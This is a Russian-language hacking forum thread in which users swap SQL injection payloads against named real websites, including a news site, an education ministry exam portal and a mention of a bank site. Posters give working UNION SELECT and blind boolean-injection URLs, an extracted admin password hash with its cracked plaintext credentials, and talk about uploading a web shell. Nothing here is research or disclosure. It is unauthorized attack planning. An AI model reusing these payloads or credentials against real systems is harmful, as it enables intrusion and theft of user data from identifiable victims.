http://stiri.rol.ro/content/view/129717/-3'+group+by+1/*/ а дальше хз че делать..у кого какие предложения?
Я ж грю,что шелл не могу залить,ибо путь не знаю =_=.Хеши у мя есть,расшифровал не все,а как зайти в бд ниипу,ибо нету привычной мне phpmyadmin =________________________=.Порт открытый,как я уже сказал,есть - (3306).КАК и ЧЕМ залогиница я не знаю =_=,ибо никогда такого не делал.
Так, ещё у меня проблемка с подзапросами(такой вот Веля нуп).По статье Scipio решил попробывать,и чота (а чо?!) не канает.Вот пример: http://www.site.com/script.php?id=38+and+(select+1+from+users)=1/* ЗЫ:В таблице 38 полей и я знаю,что таблица users существует, ибо сам из неё выбирал данные)).По идее,должно вернуть ту самую страницу с ид 38,но только без ошибки мускула =_=.Не бейте стульями и табуретками,просто очень нужно
2 Велемир А если так? http://www.site.com/script.php?id=38+and+substring((select+1+from+users),1,1)=1/* --- 2 all. У меня тоже вопросик. http://www.site.com/aindex.cfm?part=2042513+and+1=1-- - выполняется http://www.site.com/aindex.cfm?part=2042513+and+1=0-- - перебрасывает на страницу с ошибкой http://www.site.com/aindex.cfm?part=2042513-1-- - выводит http://www.site.com/aindex.cfm?part=2042512 Как я понимаю тут MSSQL, но вот как его крутить в такой ситуации?
Велемир, а я думаю, что табы users на хосте нету, ибо запрос: Даёт вывод, а запрос: завершается ошибкой...
Велемир какие подзапросы? _http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),password,user,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20,29,30,31,32,33,34,35,36,37,38+from+users-- 4.1.22-standard d23d8b79f575bcc0eedfb8c4e2f13540 admin Кстати незамысловатый пасс admin:repz
Да сломать то я его уже давно сломал,меня интересует не это.Есть банковский сайт на 4-ой версии,а до сих пор не научилсо работатьс подзапросами нормально =)),ибо там нужно знать,правильно ли ты подобрал таблицу или нет(вывода нету там).Не вслепую же всё подбирать ? Там ничего не выводится и мне нужно знать, как точно определить существование таблицы с юзерами к примеру,чтобы потом спокойно быть уверенным в том,что я правильно подбираю поля к ней.Этот сайт я привёл просто в качестве примера. ЗЫ: А пароль меня жосско порадовал,когда hashcracking.info помучил гг)
Дык а трабла то в чем? Code: http://www.a2k.org.ua/news.php?id=-1978+or+ascii(substring((SELECT%201),1,1))=49/*
Доброго времени суток. Третий час уже пытаюсь узнать в чем дело: SQL иньекция на лицо. Составляю запрос Code: http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/1,concat(admin,0x3a,password,0x3a,usertype),concat(admin,0x3a,password,0x3a,SuperAdministrator)/**/from/**/jos_users/* Но в ответ пишет: Code: Error number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* AND typ = 'hyperlink'' at line 3 Script stopped. Может кто знает в чем дело?
sakh_rider, дело в том что ты не знаешь что такое sql-inj и как оно работает. По теме - фильтруеца "/*"
Да знаю йа что такое sql injection, да и как работают тоже ... Уже были сайты, в которых получалось... Вот просто множество запросов перепробовал, а вылазит одно и тоже именно на етом сайте "+" тож пробовал(
Блин, столько времени и все зря... SELECT command denied to user 'ege'@'pro.iot.ru' for table 'users'
